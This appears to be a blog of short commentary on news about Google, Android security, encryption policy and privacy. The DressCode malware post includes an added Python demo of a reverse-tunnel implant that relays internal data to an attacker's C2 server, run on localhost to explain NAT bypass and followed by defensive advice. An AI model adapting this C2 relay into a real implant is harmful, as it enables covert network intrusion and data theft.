More than 400 malicious apps infiltrate Google Play

Ars Technica:

One malicious app infected with the so-called DressCode malware had been downloaded from 100,000 to 500,000 times before it was removed from the Google-hosted marketplace, Trend Micro researchers said in a post. Known as Mod GTA 5 for Minecraft PE, it was disguised as a benign game, but included in the code was a component that established a persistent connection with an attacker-controlled server. The server then had the ability to bypass so-called network address translation protections that shield individual devices inside a network. Trend Micro has found 3,000 such apps in all, 400 of which were available through Play.

“This malware allows threat actors to infiltrate a user’s network environment,” Thursday’s report stated. “If an infected device connects to an enterprise network, the attacker can either bypass the NAT device to attack the internal server or download sensitive data using the infected device as a springboard.”

BYOD: a great cost-saving policy. Until it leads to an attacker compromising your network and potentially exfiltrating business-vital resources.
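To make the mechanism in the Trend Micro quote concrete, here is an added, constructed demo of a reverse tunnel; it is not DressCode's code, not Trend Micro's, and not from the original post. All three roles (the inside host, the infected device, the attacker's server) run on 127.0.0.1 so it works offline; the command format (`CONNECT host port`), the single-request relay and the sample "sensitive data" are all assumptions made for the illustration. The point it shows is that NAT never "fails": the device inside opens the connection outward, which NAT allows, and the attacker simply reuses that socket to reach hosts the outside world could not otherwise address.

```python
"""Reverse-tunnel ("NAT bypass") demo, constructed for this post.

Three roles, all bound to 127.0.0.1 so the script runs offline:
  * internal_service  an inside host that an outsider could not normally reach
  * implant           the infected phone: dials OUT to the C2, then proxies inward
  * c2_fetch          the attacker's server: reaches the inside host via the implant
"""
import socket
import threading

# Constructed sample of the "sensitive data" an attacker would pull out.
SECRET = b"payroll.csv: constructed sample data\n"


def _listener():
    """Bind a TCP listener on an ephemeral localhost port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv


def internal_service(listener):
    """Inside host: answer one request line with SECRET, then close."""
    conn, _ = listener.accept()
    with conn, conn.makefile("rb") as rd:
        rd.readline()          # consume the request line
        conn.sendall(SECRET)


def implant(c2_addr):
    """Infected device: the only thing the NAT sees is an OUTBOUND connection.
    Once it is up, the C2 sends an assumed `CONNECT host port\\n` command plus
    one request line; the implant opens the inside connection and relays the
    reply back over the same outbound socket."""
    with socket.create_connection(c2_addr) as c2, c2.makefile("rb") as rd:
        cmd = rd.readline().decode().split()
        if len(cmd) != 3 or cmd[0] != "CONNECT":
            return
        request = rd.readline()
        with socket.create_connection((cmd[1], int(cmd[2]))) as inside:
            inside.sendall(request)
            inside.shutdown(socket.SHUT_WR)
            c2.sendall(inside.makefile("rb").read())   # relay until inside closes


def c2_fetch(listener, target):
    """Attacker: wait for the implant to dial in, then use that socket to reach `target`."""
    conn, _ = listener.accept()
    with conn:
        host, port = target
        conn.sendall(f"CONNECT {host} {port}\n".encode())
        conn.sendall(b"GET /payroll\n")
        return conn.makefile("rb").read()             # reply relayed by the implant


def run_demo():
    """Wire the roles together and return what the attacker obtained."""
    inside_l, c2_l = _listener(), _listener()
    workers = [
        threading.Thread(target=internal_service, args=(inside_l,)),
        threading.Thread(target=implant, args=(c2_l.getsockname(),)),
    ]
    for w in workers:
        w.start()
    loot = c2_fetch(c2_l, inside_l.getsockname())
    for w in workers:
        w.join()
    inside_l.close()
    c2_l.close()
    return loot


if __name__ == "__main__":
    print(run_demo().decode(), end="")
```

A real implant of this kind runs a general SOCKS-style proxy over the dialled-out channel rather than relaying a single request, but the trust failure is the same: a network boundary defined by connection direction stops mattering the moment something inside initiates. The practical checks that follow from this are to keep BYOD devices on a segment that cannot reach internal servers at all, to egress-filter that segment, and to watch for long-lived outbound sessions from it to unfamiliar hosts, since that persistent connection is the one thing the implant cannot avoid.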

Google’s latest IM client, Allo, isn’t ready for prime time

Ars Technica:

It’s no secret that Hangouts was poorly supported inside Google, so will Allo be any different? I’ve heard that Google Hangouts was never given resources because Google felt it would never be a money-maker. In instant messaging, you talk to your friends and send pictures back and forth, and an ad-powered Google service is never involved. With Allo, that changes because the Assistant is a gateway to search. Every question to the Assistant is a Google Search, with in-app answers coming for questions and links to generic Web searches for everything else. With search comes the possibility for ads, both from the generic search links and in the carousels that answers often provide. I’ve yet to see an advertisement inside Allo, but since it seems possible for Allo to make money, maybe it will receive more support than Hangouts did.

Setting aside the basic privacy issues of Google having access to unencrypted, plaintext, chats you have with friends and colleagues, the fact that Google is apparently unwilling to support its own products if they can’t be used to empower Google advertising is just gross. Google has impressively wasted the skills and talents of a generation of developers: imagine what might exist, today, if people were empowered to write software absent the need to data mine everything that is said for advertising purposes?

Google rebuilt a core part of Android to kill the Stagefright vulnerability for good

Google rebuilt a core part of Android to kill the Stagefright vulnerability for good:

Android’s security team patched the initial bug within weeks, but it inspired a wave of new attacks on the way Android processes audio and video files. The first copycat bugs were reported just days after the first patch, with more serious exploits arriving months later. The most recent Android patch report, released today, patches three separate vulnerabilities in Android’s media-processing function, including one critical flaw that could be used for remote code execution.

Now, Android is rebuilding that system from the ground up. When Android 7.0 Nougat began rolling out to phones last month, it came with a rebuilt media playback system, specifically designed to protect against the Stagefright family of attacks. In a post today, Android’s security team revealed new details on exactly how Nougat security has changed and what the team learned from last year’s string of bugs.

The vulnerability is more fully and truly patched! Hurray!

A shame that few users will ever receive an update to the new version of Android, let alone the patches to the previous version (6) of Android. The best/easiest way for most users to ‘update’ an Android-based mobile phone is to throw their current phone in the trash and buy a new one…and even then, the phone they buy will likely lack recent patches. Heck, they’ll be lucky if it has the most recent operating system!

This stands directly in contrast to iOS. Apple can push out a global patch and there are remarkably high levels of uptake by end-users. Google’s method of working with handset manufacturers and carriers alike puts end-users at greater and greater risk. They’re simply making dangerous products available. They’re behaving worse than Microsoft in the Windows XP days!

50 Sony BRAVIA TV models from 2012 will lose access to YouTube on Sept. 30

A hardware bug or defect is not the cause of the issue, but rather a specification change made on Google’s end that “exceed the capability of the TV’s hardware.”

SmartTVs are the future.

Chrome starts retiring Flash in favor of HTML5

Thank god that this absolute blight on computer security is finally starting to be fully deprecated. Which means it should only continue to be a problem until the mid- to late-2020s as people gradually upgrade their devices to those which will not run Flash content by default…

New York DA Wants Apple, Google to Roll Back Encryption

New York DA Wants Apple, Google to Roll Back Encryption:

[Manhattan District Attorney Cyrus Vance Jr.] said that law enforcement officials did not need an encryption “backdoor,” sidestepping a concern of computer-security experts and device makers alike.

Instead, Vance said, he only wanted the encryption standards rolled back to the point where the companies themselves can decrypt devices, but police cannot. This situation existed until September 2014, when Apple pushed out iOS 8, which Apple itself cannot decrypt.

“Tim Cook was absolutely right when he told his shareholders that the iPhone changed the world,” Vance said. “It’s changed my world. It’s letting criminals conduct their business with the knowledge we can’t listen to them.”

Vance cited a recording of a telephone call made from New York City’s Riker’s Island jail to an outside line. In the call, a defendant in a sex-crimes case tells a friend about the miraculous powers of the new smartphone operating systems.

“Apple and Google came out with these softwares that can no longer by encrypted by the police,” the defendant allegedly said, mixing up encryption with decryption. “If our phones [are] running on iOS 8 software, they can’t open my phone. That might be another gift from God.”

Correct me if I’m wrong but if you’re able to quote the conversation they had about the encryption of the device, then isn’t it the case that law enforcement can, in fact, listen in to at least some of these supposedly sophisticated criminals? Regardless of their adoption of consumer-grade (i.e. incredibly common) tools and security protocols?

But more to the point: it has never been the case that government agencies have been able to compel, or access, all of the information they might find useful in the course of their investigations. That’s normal. Government agencies enjoyed incredible access to persons’ information for the course of a decade or so, as technology companies matured into firms that took the security and privacy of their customers seriously. Asking for the industry to return to a less-mature state is bad for everyone.

Finally: while domestic agencies might be worried about the situations where they cannot access the data at rest on the device, you can be sure that governmental staff who are abroad are very happy that they can use their devices with the knowledge that even foreign state actors will be challenged in accessing the data at rest which is stored on their smartphones. American (and Canadian) law enforcement agencies are understandably pushing for greater access to information but, by the same token, their success would mean that their compatriots in China, Brazil, France, Israel, and other friendly and unfriendly states would be able to lawfully gain entry to foreign agents’ devices. I’m pretty sure that diplomatic staff and military personnel abroad are pleased that such an attack vector has been narrowed by Apple’s actions.

The Little-Known Loophole Obscuring Facebook and Google’s Transparency Reports

The Little-Known Loophole Obscuring Facebook and Google’s Transparency Reports:

For some time I’ve been asking corporate executives how they do, or don’t, account for legal requests served by Canadian authorities on American social networking companies. And the obscurity has been noted in work I’ve previously published on this topic. In an admittedly selfish way, it’s terrific to see a Canadian reporter look into this issue further only to learn that the transparency numbers provided by Google et al. do not fully account for non-US authorities’ requests for data.

Hopefully we’ll see other journalists, in countries the US has Mutual Legal Assistance Treaties (MLATs) with, file similar requests to better break down how many requests their domestic law enforcement agencies are issuing to the American companies responsible for storing and transiting so much of our personal data. While Google and other companies should be congratulated for their work it’s apparent that corporate transparency isn’t enough: we need better government accountability and corporate transparency to properly understand how, why, and how often authorities request (and receive) access to privately held telecommunications data.

How Apple and Google plan to reinvent healthcare

How Apple and Google plan to reinvent healthcare:

For many years the digital health industry has been driven by wearable devices like the Fitbit, Nike’s Fuelband, and Jawbone’s Up. But if the titans of the smartphone industry succeed in creating a dominant platform for health and fitness data, this business could be in trouble. “A lot of the basic functions we have seen in fitness wearables — tracking your steps, taking your heart rate — those functions will become basic features on a smartphone or smartwatch,” says Wang.

As someone who’s worn one of these trackers for years now [1] and who is obsessive about carrying my smartphone, I cannot disagree more. My phone does a rough calculation of how much I move every month and it’s routinely off by absolutely enormous magnitudes. [2] To some extent, that’s because the phone isn’t calibrated to precisely monitor how far I walk. To a greater extent, however, it’s because while I’m obsessive about keeping my phone around me it’s actually not on my person for about 30% of my movements each day. I don’t carry my phone at night when walking the dog, or necessarily when I wander around the building I work in.

For people who want just casual or ambient information about movement a smartphone might be fine. But anyone who is even moderately interested in tracking their activity for health reasons isn’t going to be willing to ‘guesstimate’ 1/3 of their day’s activity. The real power of smartphones is delivering information-rich notifications or aggregating data from a variety of sensors; it’s the software that they bring, first and foremost, that is their value add. And I think that for the fitness device companies to be successful they’ll need to develop powerful data mobilization schemes – you’ll need to be able to integrate data from the fitness hardware to any smartphone OS – to really capture significant portions of the market over the longer-term. I don’t buy the idea that people will keep buying sub-par products because the data is bound within a specific operating system or mobile phone ecosystem. Though, perhaps that’s just me as someone who hops between smartphone and smartphone OSes every 12–14 months.


  1. I’ve lost a pair of Fitbits, returned another, and currently use a Jawbone UP 24. I bought my first Fitbit in April 2012.
  2. As an example, my Jawbone tracked me walking somewhere between 135–150 miles last month whereas Google suggested I walked just 30–40 miles.

Crypto certificates impersonating Google and Yahoo pose threat to Windows users

Crypto certificates impersonating Google and Yahoo pose threat to Windows users:

Yet another reason why (a) the certificate authority system is broken; (b) Microsoft is stuck trying to fix problems that it (partially) brings upon itself; (c) Chrome is arguably the most secure – if not privacy protective – of the major Web browsers.

Google to deploy 180 low-orbit satellites that provide Internet access

Google to deploy 180 low-orbit satellites that provide Internet access:

It would be particularly interesting to see if Google tried to marry its satellites with its Loon project, to the effect of not having to integrate Loon balloon networks with known censorious ISPs in various countries around the world. If Google could overcome technical and regulatory hurdles it could, by routing through space, try to proxy data access via ‘open’ Internet nations. Of course, this would mean that Google would become the ‘real’ pipe to the Internet itself…